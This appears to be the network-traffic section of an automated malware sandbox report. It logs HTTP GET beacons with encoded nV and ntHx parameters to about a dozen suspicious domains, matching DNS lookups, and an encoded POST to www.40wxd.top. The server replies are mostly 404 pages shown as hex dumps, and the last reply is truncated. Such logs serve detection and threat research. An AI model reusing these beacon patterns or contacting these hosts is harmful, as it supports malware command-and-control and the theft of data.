            Source: global trafficHTTP traffic detected: GET /iqqs/?nV=f7Pu0FXPylRYdptnYM+M274MvaQkI0mPgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb6i2E7evasg+rZKL8K5GvfkdXq3aEhfRhQBOeogOLhyWDdw==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.uburn.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /eruc/?ntHx=DVDDWR70P4Ux&nV=0pHn1M2gwaL5mql+tyiDCW8+wEBXBUyoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJSHRFZ9VRSgAmugrmpHJKo8BhJN8eoKLjgrj/d04fMg3yYg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.o731lh.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA8/Tr/xM1b+8LUYxrC0lZhY3XVqHkHg9ScVh1/tZdAIFMag==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nakama2-sshl.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /ak5l/?ntHx=DVDDWR70P4Ux&nV=eH+SO6exUc8kNdksa1CSzQBVVc7aplBFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhL3O0xstuwQMp3nW6pA5kKg3bBdr252Da+1tCwmPlqiVqcw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zz82x.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /b8ih/?nV=Odz4+FoaeIgH5S8BzuYjRriywjm3wUfEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD81Bj6MrqplT1UHUL5zd01ssdakVPMNWHRSFmdvBITbtw3Bg==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /6wpo/?nV=s9KIkrkzrqTbzkMlvbBfjAUuuxKvGdewBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAeSSUnznUnGrbhm47OZW7gX2VGBRmOyGjZmEPzG32fut7kA==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.prj81oqde1.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /p9u3/?nV=D1Jc/C1nh+BZL85aQihK2StkCXQN9YWXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1EyuYNuFTcIXqGngDeSQ6xB8eOEHekfFMT1fbVeuWDNHI3uA==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /u6k6/?nV=dY5LfBxT8+4OTYgXKtZbNifUsoDX+uWzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryUTVD4Y8PctWQGLDO40gge8F8TAbPjM2Na57q5AxIn0qb9A==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.healthyloveforall.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /jqkr/?nV=j99yFPFWu1ukFCAkcsa1pdNTyzikS1cIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu8NEu/AkJhGyL6Y/IOsxIi9hhzm6Wfo2GHcU4TuRzIqeNlQ==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lurknlarkk.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzXF+iMRPEX9kIPKmzrc+t3cVFLxWq6eg+2bNJjDDlhrBGZQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mommymode.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /nuqv/?nV=cqR4daz/40w4b6rdKNYqvkeleB2fEiPhnuSAX3LrEIyAZ4914Ww4a7UdeW+JTGwq/HZWal2FK/CEDxgqbNyvyy/SGYyigH7HtG4hHq89KwpktbUpTg5pzo/PCicdM9eRug==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.polarmuseum.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global traffic | DNS traffic detected: DNS query: www.newdaydawning.net
            Source: global traffic | DNS traffic detected: DNS query: www.40wxd.top
            Source: global traffic | DNS traffic detected: DNS query: www.uburn.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.i16zb920d.cfd
            Source: global traffic | DNS traffic detected: DNS query: www.o731lh.vip
            Source: global traffic | DNS traffic detected: DNS query: www.nakama2-sshl.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.zz82x.top
            Source: global traffic | DNS traffic detected: DNS query: www.tukaari.shop
            Source: global traffic | DNS traffic detected: DNS query: www.prj81oqde1.buzz
            Source: global traffic | DNS traffic detected: DNS query: www.komart.shop
            Source: global traffic | DNS traffic detected: DNS query: www.healthyloveforall.net
            Source: global traffic | DNS traffic detected: DNS query: www.lurknlarkk.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.mommymode.site
            Source: global traffic | DNS traffic detected: DNS query: www.polarmuseum.info
            Source: global traffic | DNS traffic detected: DNS query: www
            Source: unknownHTTP traffic detected: POST /l8if/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.40wxd.topOrigin: http://www.40wxd.topConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 203Referer: http://www.40wxd.top/l8if/User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)Data Raw: 6e 56 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6c 6b 56 43 71 6d 35 35 46 72 69 71 72 56 46 41 7a 6f 4c 6d 36 53 4f 4e 47 79 4d 77 54 52 53 30 69 44 4b 63 52 4b 56 6d 30 6c 49 4c 44 50 4d 46 6f 47 2f 33 64 71 4e 7a 52 4e 56 74 70 42 4b 45 6d 37 72 47 62 67 34 34 6e 32 52 53 6f 68 54 30 58 46 4f 77 71 44 6a 6f 54 65 72 65 4e 51 39 5a 63 41 6e 41 62 44 58 45 63 59 2f 46 52 6f 6d 68 72 63 4d 46 33 74 58 31 76 74 55 6d 52 4a 52 52 69 63 2f 69 69 59 32 42 34 62 4c 66 6f 71 38 54 78 5a 56 6d 33 39 59 71 37 77 6b 54 62 62 75 39 74 30 49 46 56 4c 43 36 7a 76 31 69 49 6c 6a 56 59 4e 4b 50 2b 54 46 56 39 67 34 3d Data Ascii: nV=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm39Yq7wkTbbu9t0IFVLC6zv1iIljVYNKP+TFV9g4=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:38:21 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 
4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:38:23 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 
4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:38:26 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 
4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:38:28 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 